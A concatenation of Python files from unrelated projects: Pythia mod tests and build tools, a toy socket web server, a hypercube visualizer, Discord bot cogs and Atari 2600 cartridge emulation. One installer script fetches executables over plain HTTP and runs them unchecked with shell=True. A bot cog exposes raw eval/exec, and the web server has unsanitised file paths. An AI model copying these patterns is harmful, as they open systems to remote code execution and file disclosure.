self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
# Try calling the function
request = self.create_request('cython_numpy_basic.function', [1, 2, 3, 4])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@CythonNumpyMod', 'addons',
'cython_numpy_mod.pbo')])
self.assertEqual(output, '["r","Hello from numpy cython!"]')
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
class TestLongDirectory(Base):
dir_length = 250
def _delete_directory(self):
try:
shutil.rmtree(os.path.join(self.this_dir, '0' * self.dir_length))
except FileNotFoundError:
pass
def setUp(self):
super().setUp()
self._delete_directory()
current_dir = os.getcwd()
try:
# Create the directory by chdiring and creating a subdirectory one by one
# Because it's sometimes a problem to give abspaths... supposedly
os.chdir(self.this_dir)
for i in range(10):
next_dir = str(i) * self.dir_length
os.mkdir(next_dir)
os.chdir(next_dir)
self.long_directory_path = os.getcwd()
shutil.copytree(os.path.join(self.this_dir, '@BasicMod'),
os.path.join(self.long_directory_path, '@BasicMod'))
finally:
os.chdir(current_dir)
def tearDown(self):
super().tearDown()
self._delete_directory()
def test_long_directory(self):
request = self.create_request('basic.function', [6, 7, 8])
output, err, code = self._call_tester(
self.pythia_path,
request,
loaded_pbos=[os.path.join(self.long_directory_path, '@BasicMod', 'addons', 'basic_mod.pbo')]
)
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[6,7,8]]')
if __name__ == '__main__':
unittest.main()
```
#### File: Pythia/tools/install_mikeros_tools.py
```python
import contextlib
import os
import shutil
import subprocess
import sys
import tempfile
import urllib.request
import xml.etree.ElementTree as ET
"""Fetch and install missing Mikero's tools"""
toms_depot = 'http://tom4897.info/app/tools/community/'
disk_location = r'C:\Program Files (x86)\Mikero\DePboTools\bin' + '\\'
required_tools = {
'DePbo': disk_location + 'DePbo64.dll',
'MakePbo': disk_location + 'MakePbo.exe',
'DeOgg': disk_location + 'deOgg64.dll',
}
@contextlib.contextmanager
def tempdir(prefix='tmp'):
"""A context manager for creating and then deleting a temporary directory."""
tmpdir = tempfile.mkdtemp(prefix=prefix)
try:
yield tmpdir
finally:
shutil.rmtree(tmpdir)
def download_and_run(url, file_name):
    print('Downloading {} from: {}'.format(file_name.split('.')[0], url))
with tempdir() as directory:
file_path = os.path.join(directory, file_name)
file_raw = urllib.request.urlopen(url).read()
with open(file_path, "wb") as location:
location.write(file_raw)
print('Running installer...')
subprocess.check_call([file_path, '/S'], shell=True)
def all_installed(required_tools):
for tool_name, tool_path in required_tools.items():
if not os.path.exists(tool_path):
return False
return True
def install_tools(required_tools):
xml = urllib.request.urlopen(toms_depot + 'xml').read()
root = ET.fromstring(xml)
tools = root.findall('tool')
print('Fetching and installing tools...')
for tool_name, tool_path in required_tools.items():
if os.path.exists(tool_path):
print('{} is already installed, continuing...'.format(tool_name))
continue
tool = root.find("tool[@toolName='{}']".format(tool_name))
file_name = tool.get('fileName')
download_url = toms_depot + file_name
download_and_run(download_url, file_name)
def main():
if all_installed(required_tools):
print('All required Mikero tools are already installed. Exiting...')
sys.exit(0)
install_tools(required_tools)
if __name__ == '__main__':
main()
```
#### File: Pythia/tools/primitive_git.py
```python
import os
def get_sha1_from_file(base_dir, relative_path):
"""
Try to read base_dir/relative_path. For git head, relative_path should be 'HEAD'.
If it contains a sha1, return it.
If it contains a ref, open base_dir/<ref> and return its contents.
On error, return None
"""
    try:
        head_file_path = os.path.join(base_dir, relative_path)
        with open(head_file_path, "r") as head_file:
            head_contents = head_file.readlines()
        line = head_contents[0].rstrip('\n')
        if line.startswith('ref: '):
            ref = line[5:]  # Skip the 'ref: '
            ref_file_path = os.path.join(base_dir, ref)
            with open(ref_file_path, "r") as ref_file:
                ref_file_contents = ref_file.readlines()
            sha1 = ref_file_contents[0].rstrip('\n')
        else:
            sha1 = line
    except (IOError, IndexError):
        sha1 = None
    return sha1
def get_sha1_from_git_directory(base_repo_dir):
"""Get the sha1 of the last commit of a repository.
The base_repo_dir should contain a direct '.git' subdirectory"""
return get_sha1_from_file(os.path.join(base_repo_dir, '.git'), 'HEAD')
```
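A minimal usage sketch for the helper above; the repository path is a placeholder and the import path is assumed:
```python
# Hypothetical usage of primitive_git; '.' is assumed to be the root of a git checkout.
from primitive_git import get_sha1_from_git_directory

sha1 = get_sha1_from_git_directory('.')  # None if .git/HEAD cannot be read
print(sha1)
```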
#### File: Pythia/tools/safety_checks.py
```python
import argparse
import os
import sys
from typing import List
from pkg_resources import parse_version
def check_dll_architecture(path: str, x86=False):
arch = '32bit' if x86 else '64bit'
print(f'Checking if file {path} is {arch}...')
try:
import pefile
except ImportError:
print('Install pefile: pip install pefile')
sys.exit(1)
if not os.path.exists(path):
print(f'File {path} is missing!')
sys.exit(1)
pe = pefile.PE(path)
arch32 = bool(pe.NT_HEADERS.FILE_HEADER.Characteristics & pefile.IMAGE_CHARACTERISTICS['IMAGE_FILE_32BIT_MACHINE'])
if (x86 and not arch32) or (not x86 and arch32):
print(f'File {path} is not {arch}!')
sys.exit(1)
def check_dll_is_static(path: str, allowed_imports: List = None):
"""
Ensure a given DLL doesn't try importing some funny dependencies
because we messed up something in the compiler options or something.
"""
print(f'Checking if file {path} is static...')
try:
import pefile
except ImportError:
print('Install pefile: pip install pefile')
sys.exit(1)
if not os.path.exists(path):
print(f'File {path} is missing!')
sys.exit(1)
if allowed_imports is None:
allowed_imports = []
allowed_imports_lower = {b'kernel32.dll'}
for allowed_import in allowed_imports:
allowed_imports_lower.add(allowed_import.lower())
pe = pefile.PE(path)
file_imports = [entry.dll.lower() for entry in pe.DIRECTORY_ENTRY_IMPORT]
for file_import in file_imports:
if file_import not in allowed_imports_lower:
print(f'File {path} is not static! It imports {file_import}!')
sys.exit(1)
def check_so_architecture(path: str, x86=False):
arch = '32bit' if x86 else '64bit'
print(f'Checking if file {path} is {arch}...')
try:
import elftools
except ImportError:
print('Install elftools: pip install pyelftools')
sys.exit(1)
from elftools.elf.elffile import ELFFile
if not os.path.exists(path):
print(f'File {path} is missing!')
sys.exit(1)
with open(path, 'rb') as file:
elffile = ELFFile(file)
arch32 = elffile.elfclass == 32
if (x86 and not arch32) or (not x86 and arch32):
print(f'File {path} is not {arch}!')
sys.exit(1)
def check_so_is_manylinux2014(path: str, allowed_imports: List = None):
# PEP 599
allowed_shared_objects = {
'libgcc_s.so.1',
'libstdc++.so.6',
'libm.so.6',
'libdl.so.2',
'librt.so.1',
'libc.so.6',
'libnsl.so.1',
'libutil.so.1',
'libpthread.so.0',
'libresolv.so.2',
'libX11.so.6',
'libXext.so.6',
'libXrender.so.1',
'libICE.so.6',
'libSM.so.6',
'libGL.so.1',
'libgobject-2.0.so.0',
'libgthread-2.0.so.0',
'libglib-2.0.so.0',
}
allowed_symbol_versions = {
'GLIBC': parse_version('2.17'),
'CXXABI': parse_version('1.3.7'),
'GLIBCXX': parse_version('3.4.19'),
'GCC': parse_version('4.8.0'),
}
allowed_imports_lower = {'ld-linux.so.2', 'ld-linux-x86-64.so.2'}
if allowed_imports:
for allowed_import in allowed_imports:
allowed_imports_lower.add(allowed_import)
print(f'Checking if file {path} is manylinux2014...')
try:
import auditwheel
except ImportError:
print('Install auditwheel: pip install auditwheel')
sys.exit(1)
from auditwheel.lddtree import lddtree
from auditwheel.elfutils import elf_find_versioned_symbols
from elftools.elf.elffile import ELFFile
if not os.path.exists(path):
print(f'File {path} is missing!')
sys.exit(1)
# Check if all libs are in the allowed_shared_objects or whitelisted
elftree = lddtree(path)
libs = elftree['libs'].keys()
for lib in libs:
if lib not in allowed_shared_objects and lib not in allowed_imports_lower:
print(f'File {path} depends on {lib} which doesn\'t match the manylinux2014 requirements. '
'This file will need to be vendored in!')
sys.exit(1)
# Check if all versioned symbols are at the values in allowed_symbol_versions or lower
with open(path, 'rb') as file:
elffile = ELFFile(file)
for filename, symbol in elf_find_versioned_symbols(elffile):
symbol_name, _, version = symbol.partition('_')
if parse_version(version) > allowed_symbol_versions[symbol_name]:
print(f'There is a call to {symbol_name} at version {version} which is not allowed for manylinux2014. '
'Rebuild the code using the manylinux2014 docker image!')
sys.exit(1)
def safety_checks(python_version):
major, minor, patch = python_version.split('.')
dll_import = f'python3{minor}.dll'.encode('ascii')
so_import = f'libpython3.{minor}{"m" if minor == "7" else ""}.so.1.0'
check_dll_is_static(os.path.join('@Pythia', 'Pythia.dll'), allowed_imports=[dll_import])
check_dll_is_static(os.path.join('@Pythia', 'Pythia_x64.dll'), allowed_imports=[dll_import])
check_dll_is_static(os.path.join('@Pythia', 'PythiaSetPythonPath.dll'))
check_dll_is_static(os.path.join('@Pythia', 'PythiaSetPythonPath_x64.dll'))
print()
check_dll_architecture(os.path.join('@Pythia', 'Pythia.dll'), x86=True)
check_dll_architecture(os.path.join('@Pythia', 'Pythia_x64.dll'), x86=False)
check_dll_architecture(os.path.join('@Pythia', 'PythiaSetPythonPath.dll'), x86=True)
check_dll_architecture(os.path.join('@Pythia', 'PythiaSetPythonPath_x64.dll'), x86=False)
print()
check_so_architecture(os.path.join('@Pythia', 'Pythia.so'), x86=True)
check_so_architecture(os.path.join('@Pythia', 'Pythia_x64.so'), x86=False)
check_so_architecture(os.path.join('@Pythia', 'PythiaSetPythonPath.so'), x86=True)
check_so_architecture(os.path.join('@Pythia', 'PythiaSetPythonPath_x64.so'), x86=False)
print()
linux_imports = [so_import, 'libcrypt.so.1']
check_so_is_manylinux2014(os.path.join('@Pythia', 'Pythia.so'), allowed_imports=linux_imports)
check_so_is_manylinux2014(os.path.join('@Pythia', 'Pythia_x64.so'), allowed_imports=linux_imports)
check_so_is_manylinux2014(os.path.join('@Pythia', 'PythiaSetPythonPath.so'))
check_so_is_manylinux2014(os.path.join('@Pythia', 'PythiaSetPythonPath_x64.so'))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Perform basic safety checks over the DLLs/SOs')
parser.add_argument('version', help='Python version against which to check')
args = parser.parse_args()
safety_checks(args.version)
``` |
{
"source": "5skr0ll3r/WebCthulhu",
"score": 3
} |
#### File: 5skr0ll3r/WebCthulhu/cthulhu.py
```python
import socket,threading,re,sys,os
import reqspliter as rs
hel = ("h", "help", "H", "HELP")
#Accepted methods by server
methods = ("GET","POST","HEAD","DELETE","CONNECT","PUT","OPTIONS","TRACE","PATCH")
#Accepted file extensions
file_ext = (".html",".css",".js")
imag_ext = (".jpeg",".png",".jpg")
def requirements_check():
if len(sys.argv) < 3:
if len(sys.argv) == 1:
sys.exit(f"Usage: {sys.argv[0]} <Port> <Project_Path>")
if sys.argv[1] in hel:
sys.exit(f"Usage: {sys.argv[0]} <Port> <Project_Path>\n\n<Port>: The port you want the server to communicate through\n<Project_Path>: The path to the directory index file is in\nExample: python3 {sys.argv[0]} 5444 www")
else:
sys.exit("Uknown Error Occured")
else:
pass
def read_file(Project_Path,req_file_path,file_extension,imag_ext):
if file_extension in imag_ext:
print("\n\nIs image so read in bytes\n\n")
file_path = Project_Path + req_file_path
strip_path = file_path.strip()
print(os.path.exists(strip_path))
if os.path.exists(strip_path):
print(f"File {strip_path} found")
with open(strip_path,'rb') as op_file:
image = op_file.read()
return image, 'True'
else:
print(f"File {strip_path} not found")
return 'False'
else:
print("Not image read as string")
file_path = Project_Path + req_file_path
strip_path = file_path.strip()
print(os.path.exists(strip_path))
if os.path.exists(strip_path):
print(f"File {strip_path} found")
with open(strip_path) as op_file:
code = op_file.read()
return code
else:
print(f"File {strip_path} not found")
return 'False'
def connections_handler(connection,addr,Project_Path,imag_ext,file_ext):
print(f"=> {addr} Connected")
active_connection = True
while active_connection:
if active_connection == False:
break
packet = connection.recv(3000)
data = packet.decode('utf-8')
print(f"Data received: \n\n{data}\n\n")
req_type = rs.check_req_type(data,methods)
if req_type != "False":
req_file_path = rs.check_req_file_path(data,req_type)
if req_file_path != "False":
file_extension = rs.determine_file_ext_from_req(req_file_path,file_ext, imag_ext)
if file_extension != "False":
head_cont_type = rs.header_content_type(file_extension,imag_ext)
print("Request Accepted")
code = read_file(Project_Path,req_file_path,file_extension,imag_ext)
print(f"code\n\n{code}\n\n")
if code[1] == 'True':
msg = connection.send(
f"HTTP/1.1 200 OK\nConnection: Keep-Alive\r\nServer: Cthulhu/0.1\r\nContent-Type: {head_cont_type};\r\nKeep-Alive: timeout=5, max=1000\r\n\r\n {code[0].strip()}".encode())
connection.close()
elif code == 'False':
connection.send("HTTP/1.1 404 NOT FOUND\r\nServer: Cthulhu/0.1".encode())
connection.close()
else:
msg = connection.send(
f"HTTP/1.1 200 OK\nConnection: Keep-Alive\r\nServer: Cthulhu/0.1\r\nContent-Type: {head_cont_type};\r\nKeep-Alive: timeout=5, max=1000\r\n\r\n{code}".encode())
connection.close()
else:
connection.send("HTTP/1.1 404 NOT FOUND\r\nServer: Cthulhu/0.1".encode())
connection.close()
else:
connection.send("HTTP/1.1 404 NOT FOUND\r\nServer: Cthulhu/0.1".encode())
connection.close()
else:
connection.send("HTTP/1.1 404 NOT FOUND\r\nServer: Cthulhu/0.1".encode())
connection.close()
#Main function
def start():
requirements_check()
HOST = socket.gethostbyname(socket.gethostname())
PORT = int(sys.argv[1])
Project_Path = sys.argv[2]
#Create socket object bind with given vars and start listening
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,PORT))
s.listen()
print(f"{HOST} Started listening on port: {PORT}")
#Will create a thread for every accepted connection so the server can be non-block
while True:
connection, addr = s.accept()
thread = threading.Thread(target=connections_handler, args=(connection,addr, Project_Path,imag_ext,file_ext))
thread.start()
print(f"=> Active connections {threading.activeCount() - 1}")
start()
``` |
{
"source": "5space/hypercube-visualizer",
"score": 3
} |
#### File: 5space/hypercube-visualizer/projector.py
```python
import pygame
from math import *
import numpy as np
import itertools
from shapes import *
WIDTH = 500
HEIGHT = 500
screen = pygame.display.set_mode((WIDTH, HEIGHT))
FOV = 60
clock = pygame.time.Clock()
class Camera4D:
def __init__(self, *pos):
self.pos = np.array(pos)
def get_3d_projection(self, point):
offset = point - self.pos
if offset[0] <= 0:
x, y, z = offset[1:]
r = sqrt(x**2 + y**2 + z**2)
return 1000000*x/r, 1000000*y/r, 1000000*z/r
_, x, y, z = offset/offset[0]
return x, y, z
class Camera:
def __init__(self, *pos):
self.pos = np.array(pos)
def get_2d_projection(self, point):
offset = point - self.pos
if offset[0] <= 0:
a = atan2(offset[2], offset[1])
return (WIDTH/2 + 1000000*cos(a), HEIGHT/2 + 1000000*sin(a))
_, x, y = offset/offset[0]
mult = WIDTH/2/tan(FOV*pi/360)
return (WIDTH/2 + mult*x, HEIGHT/2 + mult*y)
GLOBAL_CAMERA = Camera4D()
p = (sqrt(5) + 1)/2
# edge_colors = {1:np.array([255, 0, 0]), 2:np.array([0, 255, 0]), 4:np.array([0, 0, 255]), 8:np.array([255, 255, 0])}
camera = Camera(-2., 0., 0.)
camera4d = Camera4D(-3., 0., 0., 0.)
points0, edges = hypercube()
angles = [0., 0., 0., 0., 0., 0.] # WX, WY, WZ, XY, XZ, YZ in that order
def get_rotated_position(p):
p = list(p)
key = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3)]
for i in range(6):
a1, a2 = key[i]
angle = angles[i]
sign_flipper = -1 if ((a2 - a1) % 2 == 0) else 1
p[a1], p[a2] = p[a1]*cos(angle) - sign_flipper*p[a2]*sin(angle), sign_flipper*p[a1]*sin(angle) + p[a2]*cos(angle)
return tuple(p)
mouse_down = False
drag_start_pos = (0, 0)
drag_offset = (0, 0)
scroll_velocity = 1
while True:
screen.fill((0, 0, 0))
points_rotated = map(get_rotated_position, points0)
points_3d = list(map(camera4d.get_3d_projection, points_rotated))
screen_space = list(map(camera.get_2d_projection, points_3d))
def distance_from_camera(x):
return np.linalg.norm((np.array(points_3d[x[0]])+points_3d[x[1]])/2 - camera.pos)
def color_of_edge(edge):
color = np.array([255, 255, 255.]) # edge_colors[abs(b-a)]
distance_mult = max(0.1, min(1, 10/(e**(-3*distance_from_camera(edge)/camera.pos[0]))))
color *= distance_mult
return tuple(np.around(color))
edges_sorted = sorted(edges, key=distance_from_camera)[::-1]
for a, b in edges_sorted:
pygame.draw.line(screen, color_of_edge((a, b)), screen_space[a], screen_space[b], 5)
# for ptx, pty in screen_space:
# pygame.draw.circle(screen, (255, 0, 0), (int(ptx), int(pty)), 3)
keys = pygame.key.get_pressed()
if keys[pygame.K_UP]:
FOV += 0.5
elif keys[pygame.K_DOWN]:
FOV -= 0.5
if keys[pygame.K_RIGHT]:
camera4d.pos[0] -= 0.01
elif keys[pygame.K_LEFT]:
camera4d.pos[0] += 0.01
if keys[pygame.K_w]:
angles[0] += pi/180
elif keys[pygame.K_s]:
angles[0] -= pi/180
if keys[pygame.K_d]:
angles[1] += pi/180
elif keys[pygame.K_a]:
angles[1] -= pi/180
if keys[pygame.K_e]:
angles[2] += pi/180
elif keys[pygame.K_q]:
angles[2] -= pi/180
for event in pygame.event.get():
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
mouse_down = True
drag_start_pos = event.pos
drag_start_angles = np.array(angles)
elif event.button == 4:
scroll_velocity = 1/3
elif event.button == 5:
scroll_velocity = 3
elif event.type == pygame.MOUSEBUTTONUP:
if event.button == 1:
mouse_down = False
if mouse_down:
x, y = pygame.mouse.get_pos()
drag_offset = (x - drag_start_pos[0], y - drag_start_pos[1])
angles = angles[:3] + list(drag_start_angles[3:] + [-pi*drag_offset[0]/WIDTH, pi*drag_offset[1]/HEIGHT, 0])
angles = [((a+pi) % (2*pi)) - pi for a in angles]
angles[4] = min(pi/2, max(-pi/2, angles[4]))
camera.pos[0] *= scroll_velocity**0.02
scroll_velocity **= 0.95
# print(angles[0]-pi/4, angles[1]-pi/4, angles[2]-pi/4)
pygame.display.flip()
clock.tick(60)
``` |
{
"source": "5space/nesbot",
"score": 2
} |
#### File: modules/debug/cog.py
```python
from discord.ext import commands
import discord
class Debug(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.group(name="module",
aliases=["m"])
@commands.is_owner()
async def module(self, ctx):
if ctx.invoked_subcommand is None:
await ctx.send("Invalid command passed.")
@module.command(name="unload",
aliases=["u", "ul"])
async def module_unload(self, ctx, *, name):
self.bot.unload_extension("modules." + name + ".cog")
self.bot.log(f"Unloaded module {name}.")
await ctx.send(f"Unloaded module {name}.")
@module.command(name="load",
aliases=["l"])
async def module_load(self, ctx, *, name):
self.bot.load_extension("modules." + name + ".cog")
self.bot.log(f"Loaded module {name}.")
await ctx.send(f"Loaded module {name}.")
@module.command(name="reload",
aliases=["r", "rl"])
async def module_reload(self, ctx, *, name):
self.bot.reload_extension("modules." + name + ".cog")
self.bot.log(f"Reloaded module {name}.")
await ctx.send(f"Reloaded module {name}.")
@module.command(name="list",
aliases=["li"])
async def module_list(self, ctx):
await ctx.send("```" + "".join(f"{module}: {len(self.bot.get_module(module).get_commands())} command(s)\n" for module in self.bot.modules) + "```")
@commands.command(name="eval")
@commands.is_owner()
async def owner_eval(self, ctx, *, query):
try:
if query[:6] == "await ":
k = await eval(query[6:], locals())
if k is not None:
await ctx.send(k)
else:
k = eval(query, locals())
if k is not None:
await ctx.send(k)
except Exception as ex:
await ctx.send(f"```{ex}```")
@commands.command(name="exec")
@commands.is_owner()
async def owner_exec(self, ctx, *, query):
try:
exec(query, locals())
except Exception as ex:
await ctx.send(f"```{ex}```")
def setup(bot):
bot.add_cog(Debug(bot))
```
#### File: pytari2600/cpu_gen/pc_state.py
```python
class PC_Register(object):
def __init__(self):
self.value = 0
def get_save_state(self):
return self.value
def set_save_state(self, state):
self.value = state
def __add__(self, x):
self.value = (self.value + x) & 0xFF
return self
def __sub__(self, x):
self.value = (self.value - x) & 0xFF
return self
def __int__(self):
return self.value
def set_value(self, value):
if isinstance(value, PC_Register):
self.value = value.get_value()
else:
self.value = value & 0xFF
def get_value(self):
return self.value
def __str__(self):
return "%X"%(self.value)
class PC_StatusFlags(object):
def __init__(self):
self._value = 0
def get_save_state(self):
return self._value
def set_save_state(self, state):
self._value = state
def get_value(self):
return self._value
def set_value(self, value):
self._value = value
def set_N(self, value):
self._value = (self._value & 0x7F) | ((value & 1) << 7)
def set_V(self, value):
self._value = (self._value & 0xBF) | ((value & 1) << 6)
def set_X1(self, value):
self._value = (self._value & 0xDF) | ((value & 1) << 5)
def set_B(self, value):
self._value = (self._value & 0xEF) | ((value & 1) << 4)
def set_D(self, value):
self._value = (self._value & 0xF7) | ((value & 1) << 3)
def set_I(self, value):
self._value = (self._value & 0xFB) | ((value & 1) << 2)
def set_Z(self, value):
self._value = (self._value & 0xFD) | ((value & 1) << 1)
def set_C(self, value):
self._value = (self._value & 0xFE) | (value & 1)
def get_N(self):
return (self._value >> 7) & 1
def get_V(self):
return (self._value >> 6) & 1
def get_X1(self):
return (self._value >> 5) & 1
def get_B(self):
return (self._value >> 4) & 1
def get_D(self):
return (self._value >> 3) & 1
def get_I(self):
return (self._value >> 2) & 1
def get_Z(self):
return (self._value >> 1) & 1
def get_C(self):
return (self._value) & 1
def __str__(self):
return "(C:%s Z:%s I:%s D:%s B:%s X1:%s V:%s N:%s)"%(
self.get_C(), self.get_Z(), self.get_I(), self.get_D(),
self.get_B(), self.get_X1(), self.get_V(), self.get_N())
class PC_State(object):
def __init__(self):
self.A = PC_Register()
self.X = PC_Register()
self.Y = PC_Register()
self.PC = 0
self.S = PC_Register()
self.CYCLES_TO_CLOCK = 3
self.P = PC_StatusFlags()
def get_save_state(self):
state = {}
state['A'] = self.A.get_save_state()
state['X'] = self.X.get_save_state()
state['Y'] = self.Y.get_save_state()
state['PC'] = self.PC
state['S'] = self.S.get_save_state()
state['P'] = self.P.get_save_state()
return state
def set_save_state(self, state):
self.A.set_save_state(state['A'])
self.X.set_save_state(state['X'])
self.Y.set_save_state(state['Y'])
self.PC = state['PC']
self.S.set_save_state(state['S'])
self.P.set_save_state(state['P'])
def __str__(self):
return "PC:%X X:%X Y:%X A:%X %s"%(
self.PC,
self.X, self.Y, self.A,
self.P)
def get_PCL(self):
return self.PC & 0xFF
def get_PCH(self):
return (self.PC >> 8) & 0xFF
def set_PCL(self, value):
self.PC = self.PC & 0xFF00 | (value & 0xFF)
def set_PCH(self, value):
self.PC = self.PC & 0xFF | ((value & 0xFF) << 8)
```
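A small sketch of how the status-flag accessors above pack bits into the single `_value` byte; the flag values chosen are illustrative only and the import path is assumed:
```python
# Illustrative use of PC_StatusFlags; bit positions follow the setters above.
from pc_state import PC_StatusFlags

p = PC_StatusFlags()
p.set_C(1)   # carry    -> bit 0
p.set_Z(1)   # zero     -> bit 1
p.set_N(1)   # negative -> bit 7
assert p.get_value() == 0b10000011
print(p)     # (C:1 Z:1 I:0 D:0 B:0 X1:0 V:0 N:1)
```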
#### File: pytari2600/memory/cartridge.py
```python
class PBCartridge(object):
MAXBANKS = 8
BANKSIZE = 0x0400
def __init__(self, file_name):
self.max_banks = PBCartridge.MAXBANKS
self.bank_size = PBCartridge.BANKSIZE
self._slice = [0]*4
self._slice[0] = 4
self._slice[1] = 5
self._slice[2] = 6
self._slice[3] = 7
self.num_banks = 0
self.current_bank = 0
self._file_name = file_name
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['current_bank'] = self.current_bank
state['file_name'] = self._file_name
state['slices'] = list(self._slice)
return state
def set_save_state(self, state):
self.current_bank = state['current_bank']
self._file_name = state['file_name']
self._slice = list(state['slices'])
def get_absolute_address(self, address):
absolute = self.bank_size * self._slice[(address & 0xC00) >> 10] + (address & 0x3FF)
return absolute
def write(self, address, data):
address = address & 0xFFF
if 0xFE0 == (address & 0xFF8):
self._slice[0] = address & 0x7
elif 0xFE8 == (address & 0xFF8):
self._slice[1] = address & 0x7
elif 0xFF0 == (address & 0xFF8):
self._slice[2] = address & 0x7
def read(self, address):
"""
0xFF6 == address: Last bank - 3
0xFF7 == address: Last bank - 2
0xFF8 == address: Last bank - 1
0xFF9 == address: Last bank
"""
address = address & 0xFFF
if 0xFE0 == (address & 0xFF8):
self._slice[0] = address & 0x7
elif 0xFE8 == (address & 0xFF8):
self._slice[1] = address & 0x7
elif 0xFF0 == (address & 0xFF8):
self._slice[2] = address & 0x7
return self.cartridge_banks[self._slice[(address & 0xC00) >> 10]][address & 0x3FF]
def _load_cartridge(self, filename):
bytes_read = 0
total_bytes_read = 0
self.max_cartridge = [[]] * self.max_banks
print("Opening: ", filename)
with open(filename, 'rb') as rom_file:
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
if (bytes_read != 0):
self.max_cartridge[self.num_banks] = bytearray(bank)
self.num_banks += 1
total_bytes_read += bytes_read
if (bytes_read > 0) and (bytes_read < self.bank_size):
print("Warning: Short Cartridge")
self.cartridge_banks = [[]] * self.num_banks
for i in range(self.num_banks):
self.cartridge_banks[i] = self.max_cartridge[i]
# Set default bank to the last bank.
self.current_bank = 0
print("PBCartridge read:")
print(" banks =", self.num_banks)
print(" bytes =", total_bytes_read)
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
class MNetworkCartridge(object):
MAXBANKS = 8
BANKSIZE = 0x0800
RAMSIZE = 0x0800
def __init__(self, file_name):
self.max_banks = MNetworkCartridge.MAXBANKS
self.bank_size = MNetworkCartridge.BANKSIZE
self.ram_size = MNetworkCartridge.RAMSIZE
self.num_banks = 0
self.bank_select = 0
self.ram_select = 0
self.ram = []
self._file_name = file_name
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['ram'] = list(self.ram)
state['current_bank'] = self.current_bank
state['ram_select'] = self.ram_select
state['file_name'] = self._file_name
return state
def set_save_state(self, state):
self.ram = list(state['ram'])
self.current_bank = state['current_bank']
self.ram_select = state['ram_select']
self._file_name = state['file_name']
def get_absolute_address(self, address):
bank = self.bank_select
if ((address & 0xF00) >= 0xA00):
bank = 7
return bank * self.bank_size + (address & 0x7FF)
def write(self, address, data):
address = address & 0xFFF
if 0xFE0 == (address & 0xFF8):
# Bank select 0 to 7
self.bank_select = address & 0x7
elif 0xFE8 == (address & 0xFF8):
# 256k Ram select.
self.ram_select = address & 0x3
if (self.bank_select == 7 and 0x000 == (address & 0x800)):
self.ram[address & 0x3FF] = data
elif 0x800 == (address & 0xF00):
# Selectable 256Kb RAM. write on 1800-18FF
self.ram[(address & 0x7FF) | 0x400 | (self.ram_select << 8)] = data
else:
print("Invalid write address %x"%(address))
def read(self, address):
address = address & 0xFFF
if (0xFE0 == (address & 0xFF8)):
self.bank_select = address & 0x7
elif (0xFE8 == (address & 0xFF8)):
self.ram_select = address & 0x3
if ((self.bank_select == 7) and (0x400 == (address & 0xC00))):
# Return reads from ram.
byte = self.ram[address & 0x3FF]
elif (0x000 == (address & 0x800)):
# Return cartridge select.
byte = self.cartridge_banks[self.bank_select][address & 0x7FF]
elif (0x900 == (address & 0xF00)):
# Selectable 256Kb RAM. write on 1800-18FF
byte = self.ram[(address & 0x7FF) | 0x400 | (self.ram_select << 8)]
elif ((address & 0xF00) >= 0xA00):
# Return fixed cartridge location.
byte = self.cartridge_banks[7][address & 0x7FF]
else:
print("Invalid address %x"%(address))
byte = 0
return byte
def _load_cartridge(self, filename):
bytes_read = 0
total_bytes_read = 0
self.max_cartridge = [[]] * self.max_banks
print("Opening: ", filename)
        self.ram = [0] * self.ram_size
with open(filename, 'rb') as rom_file:
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
if bytes_read != 0:
self.max_cartridge[self.num_banks] = bytearray(bank)
self.num_banks += 1
total_bytes_read += bytes_read
self.cartridge_banks = [[]] * self.num_banks
for i in range(self.num_banks):
self.cartridge_banks[i] = self.max_cartridge[i]
# Set default bank to the last bank.
self.current_bank = 0
print("MNetworkCartridge read:")
print(" banks = ", self.num_banks)
print(" bytes = ", total_bytes_read)
print(" first bank size = ", len(self.cartridge_banks[0]))
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
class FECartridge(object):
def __init__(self, file_name, max_banks, bank_size):
self.max_banks = max_banks
self.bank_size = bank_size
self.cartridge_banks = [[]] * self.max_banks
self.num_banks = 0
self.current_bank = 0
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['current_bank'] = self.current_bank
state['file_name'] = self._file_name
return state
def set_save_state(self, state):
self.current_bank = state['current_bank']
self._file_name = state['file_name']
def get_absolute_address(self, address):
if 0x0000 == (address & 0x2000):
current_bank = 1
elif 0x2000 == (address & 0x2000):
current_bank = 0
return current_bank * self.bank_size + (address & 0xFFF)
def read(self, address):
if 0x0000 == (address & 0x2000):
self.current_bank = 1
elif 0x2000 == (address & 0x2000):
self.current_bank = 0
address = address & 0xFFF
return self.cartridge_banks[self.current_bank][address]
def write(self, address, data):
if 0x0000 == (address & 0x2000):
self.current_bank = 1
elif 0x2000 == (address & 0x2000):
self.current_bank = 0
def _load_cartridge(self, filename):
total_bytes_read = 0
print("Opening:", filename)
with open(filename, 'rb') as rom_file:
self.max_cartridge = [[]] * self.max_banks
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
print("nb:%d,%x"%(self.num_banks, self.bank_size))
if bytes_read != 0:
self.max_cartridge[self.num_banks] = bytearray(bank)
self.num_banks += 1
total_bytes_read += bytes_read
self.cartridge_banks = [[]] * self.num_banks
for i in range(self.num_banks):
self.cartridge_banks[i] = self.max_cartridge[i]
# Set default bank to the last bank.
self.current_bank = 0
print("Cartridge read:")
print(" banks = ", self.num_banks)
print(" bytes = ", total_bytes_read)
print(" first bank size = ", len(self.cartridge_banks[0]))
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
class SingleBankCartridge(object):
""" Simple, single bank cartridge, no bank switching. """
def __init__(self, file_name, bank_size):
